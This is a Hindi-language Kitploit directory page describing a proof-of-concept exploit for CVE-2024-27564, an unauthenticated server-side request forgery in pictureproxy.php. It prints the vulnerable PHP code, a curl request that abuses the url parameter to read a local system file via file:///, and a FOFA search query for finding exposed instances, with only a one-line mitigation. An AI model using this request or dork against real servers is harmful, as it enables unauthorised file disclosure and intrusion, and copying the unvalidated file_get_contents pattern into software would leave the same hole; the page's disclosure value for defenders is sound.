Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27564 — CVE-2024-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, pictureproxy.php में एक सर्वर-साइड अनुरोध जालसाजी (SSRF) भेद्यता जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को url पैरामीटर के माध्यम से मनमाना URL इंजेक्ट करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/chsxthwik/cve-2024-27564
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षा
GitHubchsxthwik/cve-2024-27564

CVE-2024-27564

CVE-2024-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, pictureproxy.php में एक सर्वर-साइड अनुरोध जालसाजी (SSRF) भेद्यता जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को url पैरामीटर के माध्यम से मनमाना URL इंजेक्ट करने की अनुमति देती है।

रिपॉजिटरी देखें
12411 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-27564

विवरण:

pictureproxy.php में एक भेद्यता दूरस्थ हमलावरों को url पैरामीटर में URL इंजेक्ट करके मनमाना अनुरोध करने की अनुमति देती है। यह SSRF भेद्यता बिना प्रमाणीकरण के शोषित की जा सकती है, जो इसे विशेष रूप से खतरनाक बनाती है।

भेद्य कोड pictureproxy.php फ़ाइल में है। समस्या इसलिए उत्पन्न होती है क्योंकि फ़ंक्शन url पैरामीटर को ठीक से मान्य नहीं करता है। $_GET['url'] वेरिएबल को file_get_contents() फ़ंक्शन में पास किया जाता है, जो निर्दिष्ट URL से सामग्री प्राप्त करता है। यह SSRF की ओर ले जा सकता है।

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Curl अनुरोध:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

डॉर्किंग:

FOFA= "title="ChatGPT个人专用版""

शमन:

इनपुट सत्यापन का उचित प्रबंधन आवश्यक है।

टूल डाउनलोड करें